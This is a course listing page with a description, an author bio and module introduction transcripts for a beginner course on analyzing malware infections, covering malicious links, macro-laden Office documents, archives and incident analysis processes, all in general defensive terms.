Getting Started Analyzing Malware Infections

Malware infections are growing at an alarming rate. This course will teach you how to safely analyze malicious links, infected documents, and malicious archives with the focus on gathering indicators of compromise.
Course info
Rating
(17)
Level
Beginner
Updated
Feb 8, 2017
Duration
2h 17m
Table of contents
Course Overview
Investigating Malware Infections
Analyzing Malicious Links
Dissecting Infected Documents
Analyzing Malicious Archives
Designing the Process for Analyzing Malware
Description
Course info
Rating
(17)
Level
Beginner
Updated
Feb 8, 2017
Duration
2h 17m
Description

Computer virus outbreaks are becoming more complex and use clever deployment tactics that trick people into getting infected, even without their knowledge. Traditional antivirus technologies have a hard time keeping up. There is a need for security analysts that are able to tackle these infections and stop them from infecting other computers. In this course, Getting Started Analyzing Malware Infections, you'll learn how to safely contain and analyze suspicious files and URLs. Next, you learn to extract malicious scripts from documents, deobfuscate them, and extract indicators that lead to other malware components. Finally, you will learn to investigate virus deployment techniques that bypass modern security controls. When you're finished with this course, you will have the skills and the knowledge to build layered defenses that will disrupt the infection chain at multiple stages protecting your data and your company.

About the author
About the author

Cristian is a Information Security Professional with experience in supply chain, manufacturing, gaming, and entertainment sectors for Fortune 500 companies. He has provided expertise in incident response cases by performing forensic investigations, malware analysis, and elaborating mitigation plans against complex cyber attacks.

More from the author
Threat Intelligence: The Big Picture
Beginner
1h 43m
Aug 3, 2017
Section Introduction Transcripts
Section Introduction Transcripts

Course Overview
Hi everyone, my name is Christian Pascariu, and welcome to my course, Getting Started Analyzing Malware Infections. I am an information security professional. Over the years, I have gained some valuable experience in the field of malware analysis, incident response, and forensics that I want to share with you. Until a while ago, we thought of computer viruses as malicious toolbars. Nowadays we are seeing some advanced malware that can encrypt data and demand ransom in return. The main reason behind this course is to share with you a structured approach that you can make use of in tackling a wide variety of malware types that is guaranteed to generate some actionable results. In this course, we are going to analyze computer viruses over multiple scenarios to develop better, more effective endpoint and network defenses. Some of the major topics that we will cover include generic malware behavior and indicators of malicious activity, common delivery tactics that leverage phishing emails, we will dissect infected documents to uncover hidden malware components, we will perform static and dynamic analysis and also monitor malicious network activity. By the end of this course, you'll know the right techniques for investigating malicious infections based on their type, and use the right tools in the analysis process. Before beginning this course, you should be familiar with basic security concepts. I hope you will join me on this journey to learn malware analysis with the Getting Started Analyzing Malware Infections course at Pluralsight.

Dissecting Infected Documents
Hello again. In this module, we'll be dissecting infected documents. Our non-technical colleagues work with them on a daily basis to support business needs. Hackers use this as an opportunity to spread computer viruses. As security analysts, we must be able to tackle these document-based infections and restore business activities to normal. We will start off this module by going over the tactics used in document-based attacks, and also how infections occur. It's really important to understand Visual Basic, as this serves as a foundation for building malware components. We'll investigate different obfuscation tactics used by hackers to hide indicators within malicious scripts that are bundled with Office documents. After, new tools will be added to our analysis arsenal. This will help us in tackling infected documents. We'll use them to extract malicious scripts and perform static analysis. Attackers employ some advanced tactics that make indicator discovery difficult. Don't worry, we'll use script debugging to facilitate them automating the obfuscation and uncover hidden indicators in a very short time, granting us the ability to work more on elaborating defenses. Now let's get some more details about malicious documents and how they are used to spread virus infections.

Designing the Process for Analyzing Malware
Welcome back. We have gained a lot of technical information over the past infection scenarios, and now we stand to create a process to ensure the right quality of work over multiple investigations. We will start by focusing on the bigger picture, reconstructing the infection, as this ensures we don't miss out on any hidden indicators. With experience, we notice some common stages and techniques that we use during a virus infection. We need to create analysis procedures to make sure that we don't miss anything in future investigations. The overall success of an investigation comes from avoiding common pitfalls, so we will take note of these and look at the right approach. We also have to be aware that we're not alone when it comes to protecting data, and we'll go through a list of things that are present in most of the organizations that can help us a lot. Also, we will look at where to start in terms of protecting our organization by working closer with the non-technical teams as well. Up next, we will take a look at an efficient way to reconstruct an infection scenario.